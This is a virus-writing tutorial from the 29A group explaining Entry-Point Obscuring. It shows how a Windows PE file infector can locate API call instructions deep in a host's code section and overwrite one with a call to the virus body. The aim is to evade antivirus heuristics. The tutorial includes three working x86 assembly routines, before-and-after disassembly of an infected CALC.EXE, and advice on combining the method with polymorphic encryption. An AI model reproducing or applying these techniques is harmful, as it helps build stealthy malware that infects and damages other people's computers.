EPO: Entry-Point Obscuring
by GriYo / 29A


In order to recive control a virus can modify an executable in several ways:

The first way is easy, but almost every decent antivirus nowadays will mark infected files as suspicious.

The reason? A file whose entry-point is outside code section is, at last, suspicious.

The second way is a bit more complex. The virus can overwrite the first instruction (the one pointed by the entry-point field in file header) with a jump or call to itself. Cabanas virus uses this method.

Using the second way the virus will fool some antivirus, but some others still report the suspicious flag while scanning.

The reason? The antivirus looks at the code on the file entry-point and detects a jump or call outside code section.

We can generate some random instructions before the jump or call to virus code. If the antivirus just look at first instruction it will fail on detecting the jump to virus.

Marburg and Parvo viruses uses this method, but now this is not enough. Some antivirus can trace through this garbage code and can find the jump outside the code section, reporting the suspicious flag again.

Solution? We have to inject a jump or call to our virus inside host code, but far away of the file entry-point.

To do this we can emulate each instruction until we find a save place.

But wait! There is no real need for writing a debugger-like virus. We can take advantage of the PE structure in order to fast-scan the file looking for a place to insert a jump or call to virus code.

How? Lets look at this dump of CALC.EXE code section:

	01 .text

		SH_PointerToRawData	00001000
		SH_VirtualAddress	00001000
		SH_SizeOfRawData	0000C000
		SH_VirtualSize		0000BF22
	
		characteristics		60000020

					CODE
					MEM_EXECUTE
					MEM_READ

The entry-point is at 00005D30h, and the code there looks like this:

	01285D30 64A100000000   mov    eax,fs:[00000000]
	01285D36 55             push   ebp
	01285D37 8BEC           mov    ebp,esp
	01285D39 6AFF           push   FFFFFFFF
	01285D3B 6808DF2801     push   0128DF08
	01285D40 68D4742801     push   012874D4
	01285D45 50             push   eax
	01285D46 64892500000000 mov    fs:[00000000],esp
	01285D4D 83EC60         sub    esp,00000060
	01285D50 53             push   ebx
	01285D51 56             push   esi
	01285D52 57             push   edi
	01285D53 8965E8         mov    [ebp-18],esp
	01285D56 FF1568D02801   call   [0128D068]
	01285D5C A38CF52801     mov    [0128F58C],eax
	01285D61 33C0           xor    eax,eax

Skip first instructions and go to the one at 01285D56. This instruction takes the address at 0128D068 and executes the routine there. At the mentioned address is the value 77F13FD5, which is the entry point of GetVersion api. So this instruction calls GetVersion.

Now look at the opcodes of this instruction: FF1568D02801

	15FF		CALL indirect
	0128D068	Pointer to the routine entry point

Well, nothing new by now, but lets walk the reverse way, now we want to find a call to an api inside the program code. So take the entry point raw (00005D30) and look there:

	00005D30 64 A1 00 00 00 00 55 8B dí    Uï
	00005D38 EC 6A FF 68 08 DF 28 01 8j h.¯(.
	00005D40 68 D4 74 28 01 50 64 89 h+t(.Pdë
	00005D48 25 00 00 00 00 83 EC 60 %    â8`
	00005D50 53 56 57 89 65 E8 FF 15 SVWëeF .
	00005D58 68 D0 28 01 A3 8C F5 28 h-(.úî)(
	00005D60 01 33 C0 A0 8D F5 28 01 .3+áì)(.
	00005D68 A3 98 F5 28 01 A1 8C F5 úÿ)(.íî)
	00005D70 28 01 C1 2D 8C F5 28 01 (.--î)(.
	00005D78 10 25 FF 00 00 00 A3 94 .%    úö
	00005D80 F5 28 01 C1 E0 08 03 05 )(.-a...

If we scan this area looking for the CALL opcodes (FF15) we will find them at 00005D56. After this opcodes comes a pointer to the routine entry point, lets examine it:

        00005D58 68 D0 28 01 -> 0128D068

Lets see whats at 0128D068 in our memory image of the file:

        0128D068 -> Pointer to routine entry point
        01280000 -> Image base address in file header
	--------
        0000D068 -> Rva of routine entry point

Look now at this dump of CALC.EXE imports section:

	02 .rdata

		SH_PointerToRawData	0000D000
		SH_VirtualAddress	0000D000
		SH_SizeOfRawData	00002000
		SH_VirtualSize		00001F0A
	
		characteristics		60000020

					INITIALIZED_DATA
					MEM_READ

Well! it seems that we have found the form of locating calls to APIs inside the code of the host. But the bytes FF15h dont have to belong to an API call. It could be, for example, of a MOV EAX,0000FF15h. How can be sure?

We will exploit the PE structure in order to extract the name from the API to which makes reference the CALL instruction.

Look at the raw address corresponding to 0000D068 rva ( in this example rva is equal to raw).

	0000D068 24 E8 00 00

Ought! This isnt the entry point of GetVersion (77F13FD5) but wait! Look at offset 0000E824 in the file:

	0000E824 4C 01 47 65 74 56 65 72 L.GetVer
	0000E82C 73 69 6F 6E 00 00 6B 00 sion..k.

This is how programs import an api by name. The first word is the api 'hint' and its followed by the api name.

In summary:

	Code section			Imports section
	------------------------------- -------------------------------

	01285D56 - call [0128D068]
			     ^
                 '--------->D068 - 24 E8 00 00
			         			^	
				     ,----------'
				     |
                     '->E824 - 4C 01
					    E826 - "GetVersion"

Let us put hands to the work. The following code is a first approach to the exposed:

;----------------------------------------------------------------------------
;Example 1
;
;On entry:
;                               ebx -> Host base address
;                               ecx -> Pointer to RAW data or NULL if error
;                               edx -> Entry-point RVA
;                               esi -> Pointer to IMAGE_OPTIONAL_HEADER
;                               edi -> Pointer to section header
;                               ebp -> Virus delta offset
;
;On exit:
;                               ebx -> Not changed
;                               ecx -> Pointer to instruction after the api 
;				       call or NULL if error
;
;----------------------------------------------------------------------------

example_1:			mov edx,dword ptr [esi+OH_ImageBase]
				mov esi,ecx
				mov ecx,dword ptr [edi+SH_VirtualSize]
				sub ecx,eax
				dec ecx
search_call:			lodsw
				dec esi
				cmp ax,15FFh
				je found_call
				loop search_call
				ret			;Opcode not found
found_call:			inc esi
				lodsd
				sub eax,edx
				mov edx,eax
				push esi
				call RVA2RAW
				pop esi
				jecxz e_get_code_raw
				xchg ecx,esi
				lodsd
				lea esi,dword ptr [ebx+eax]
				lodsw
				mov edx,ecx
				mov ecx,00000020h
				mov edi,esi
				xor eax,eax
IsThisStr:			scasb
				jz OhYesItIs
				loop IsThisStr
				ret		;Null terminator not found
OhYesItIs:			push edx	;Ptr to next instruction
				push esi
				push dword ptr [ebp+hKERNEL32]
				call dword ptr [ebp+a_GetProcAddress]
				pop ecx
				sub ecx,ebx
				or eax,eax
				jnz e_get_code_raw
				mov ecx,eax
e_get_code_raw:			ret

;End of example 1
;----------------------------------------------------------------------------

Once the virus obtains a valid pointer it can copy the instruction there into a save buffer and patch it with a jump or call to viral code.

Using this example the code at CALC.EXE entry point now looks like this:

	01285D30 64A100000000   mov    eax,fs:[00000000]
	01285D36 55             push   ebp
	01285D37 8BEC           mov    ebp,esp
	01285D39 6AFF           push   FFFFFFFF
	01285D3B 6808DF2801     push   0128DF08
	01285D40 68D4742801     push   012874D4
	01285D45 50             push   eax
	01285D46 64892500000000 mov    fs:[00000000],esp
	01285D4D 83EC60         sub    esp,00000060
	01285D50 53             push   ebx
	01285D51 56             push   esi
	01285D52 57             push   edi
	01285D53 8965E8         mov    [ebp-18],esp
	01285D56 FF1568D02801   call   [0128D068]
	01285D5C E898800000     call   0128DDF9
	01285D61 33C0           xor    eax,eax

As you can see the instruction:

	01285D5C A38CF52801     mov    [0128F58C],eax

Has been overwritten by this one:

	01285D5C E898800000     call   0128DDF9

This will push into stack the address of the next instruction. The virus can pop this address in order to restore the original code there (saved while infecting the file) and transfer control back to the host when its work is done.

If you test by yourself you will find that the above code isnt very smart.

Lets think on how the code at example 1 works and see what happens when handling the following code:

                 
			jecxz label
			push ecx
			call CloseHandle
			push eax
label:			...

And this is how the above code looks once patched:

			jecxz label
			push ecx
			call CloseHandle
			call go2virus

The problem here is the jecxz instruction that may transfer control somewhere in the middle of the call to virus. So if ecx is 00000000h our virus wont execute, and the jecxz will jump to an invalid position.

The previous example is incorrect on purpose, it is good to show one of the most common pitfalls when we patch an executable.

Lets modify the code on example 1 to handle this situation.

;----------------------------------------------------------------------------
;Example 2
;
;On entry:
;                               ebx -> Host base address
;                               ecx -> Pointer to RAW data or NULL if error
;                               edx -> Entry-point RVA
;                               esi -> Pointer to IMAGE_OPTIONAL_HEADER
;                               edi -> Pointer to section header
;                               ebp -> Virus delta offset
;
;On exit:
;                               ebx -> Not changed
;                               ecx -> Inject point offset in file or NULL if error
;
;----------------------------------------------------------------------------

example_2:			mov edx,dword ptr [esi+OH_ImageBase]
				mov esi,ecx
				mov ecx,dword ptr [edi+SH_VirtualSize]
search_call:			push ecx
				lodsw
				dec esi
				cmp ax,15FFh
				jne NoCallOpcode
				push esi
				inc esi
				lodsd
				sub eax,edx
				mov edx,eax
				push esi
				call RVA2RAW
				pop esi
				jecxz NextApe
				xchg ecx,esi
				lodsd
				sub eax,edx
				lea esi,dword ptr [eax+ebx]
				lodsw
				mov edx,ecx
				mov ecx,00000020h
				mov edi,esi
				xor eax,eax
IsThisStr:			scasb
				jz FoundNull
				loop IsThisStr
NextApe:			pop esi
NoCallOpcode:			pop ecx
				loop search_call
ExitApe:			ret			;Opcode not found
FoundNull:			push edx
				push esi
				push dword ptr [ebp+hKERNEL32]
				call dword ptr [ebp+a_GetProcAddress]
				pop ecx
				sub ecx,ebx
				sub ecx,00000006h
				or eax,eax
				jz NextApe
				pop eax
				pop eax
				ret

;End of example 2
;----------------------------------------------------------------------------

Now we overwrite the api call with our call to virus body, instead of writing it next. Using this way we will never overwrite any instruction except the api call. Lets return to our example using CALC.EXE as goat.

This was CALC.EXE original code before infection:

	01285D30 64A100000000   mov    eax,fs:[00000000]
	01285D36 55             push   ebp
	01285D37 8BEC           mov    ebp,esp
	01285D39 6AFF           push   FFFFFFFF
	01285D3B 6808DF2801     push   0128DF08
	01285D40 68D4742801     push   012874D4
	01285D45 50             push   eax
	01285D46 64892500000000 mov    fs:[00000000],esp
	01285D4D 83EC60         sub    esp,00000060
	01285D50 53             push   ebx
	01285D51 56             push   esi
	01285D52 57             push   edi
	01285D53 8965E8         mov    [ebp-18],esp
	01285D56 FF1568D02801   call   [0128D068]
	01285D5C A38CF52801     mov    [0128F58C],eax
	01285D61 33C0           xor    eax,eax

And this is once infected using code on example 2:

	01285D30 64A100000000   mov    eax,fs:[00000000]
	01285D36 55             push   ebp
	01285D37 8BEC           mov    ebp,esp
	01285D39 6AFF           push   FFFFFFFF
	01285D3B 6808DF2801     push   0128DF08
	01285D40 68D4742801     push   012874D4
	01285D45 50             push   eax
	01285D46 64892500000000 mov    fs:[00000000],esp
	01285D4D 83EC60         sub    esp,00000060
	01285D50 53             push   ebx
	01285D51 56             push   esi
	01285D52 57             push   edi
	01285D53 8965E8         mov    [ebp-18],esp
	01285D56 E898800000     call   0128DDF3
	01285D5B 01		db 01h
	01285D5C A38CF52801     mov    [0128F58C],eax
	01285D61 33C0           xor    eax,eax

Note that our injected call instruction uses less bytes than the api call. As result everything stays on its place, except for the call, that now will transfer control to our virus.

Also note that we are working with the first api call found from the entry point to the end of code section. But we can skip some apis until a point somewhere deep-inside code section. Let modify example 2 to do this:

;----------------------------------------------------------------------------
;Example 3
;
;On entry:
;                               ebx -> Host base address
;                               ecx -> Pointer to RAW data or NULL if error
;                               edx -> Entry-point RVA
;                               esi -> Pointer to IMAGE_OPTIONAL_HEADER
;                               edi -> Pointer to section header
;                               ebp -> Virus delta offset
;
;On exit:
;                               ebx -> Not changed
;                               ecx -> Inject point offset in file or NULL if error
;
;----------------------------------------------------------------------------

example_3:			mov eax,dword ptr [edi+SH_VirtualSize]
				shr eax,01h
				call get_rnd_range
				mov edx,dword ptr [esi+OH_ImageBase]
				lea esi,dword ptr [eax+ecx]
				mov ecx,dword ptr [edi+SH_VirtualSize]
				sub ecx,eax
search_call:			push ecx
				lodsw
				dec esi
				cmp ax,15FFh
				jne NoCallOpcode
				push esi
				inc esi
				lodsd
				sub eax,edx
				mov edx,eax
				push esi
				call RVA2RAW
				pop esi
				jecxz NextApe
				xchg ecx,esi
				lodsd
				sub eax,edx
				lea esi,dword ptr [eax+ebx]
				lodsw
				mov edx,ecx
				mov ecx,00000020h
				mov edi,esi
				xor eax,eax
IsThisStr:			scasb
				jz FoundNull
				loop IsThisStr
NextApe:			pop esi
NoCallOpcode:			pop ecx
				loop search_call
ExitApe:			ret			;Opcode not found
FoundNull:			push edx
				push esi
				push dword ptr [ebp+hKERNEL32]
				call dword ptr [ebp+a_GetProcAddress]
				pop ecx
				sub ecx,ebx
				sub ecx,00000006h
				or eax,eax
				jz NextApe
				pop eax
				pop eax
				ret

;End of example 3
;----------------------------------------------------------------------------

The above code gets a random number from 00000000h to the end of code section size, and start searching there for any api call. Yes, the random number generator and the RVA2RAW routines arent included, write your own ones.

While playing with the above stuff i found the following problems:

Files generated with Borland linker does not use the calling structure we saw before. So we have to handle them in a different way. Binded files also need some special care.

Another *not-so-much-smart* part is to use GetProcAddress to check the API name. Would be better to check whenever a RVA points inside Import Section.

I admit it, the above examples are pure shit, but enough to easily explain the idea behind.

Using this method the virus entry-point will be definetively hidden and a virus using this plus a polymorphic engine may be really hard to spot.

If the polymorphic engine succesfully produces a complete random pattern and the entry point to this pattern of code is unknown the virus will be safe of lame AV detection technics for long time.

I wrote the whole routine again keeping in mind all this problems. You can find the result in the source code of the CTX-Phage virus. It shows how to implement the "EPO" tech in conjuntion with strong polymorphic encryption.

Another possibility is to locate structures generated by high level languages compilers. For instance:

	01012420 55             push   ebp
	01012421 8BEC           mov    ebp,esp

I leave this part to you, have fun.

GriYo / 29A

I'm not in the business...
...I am the business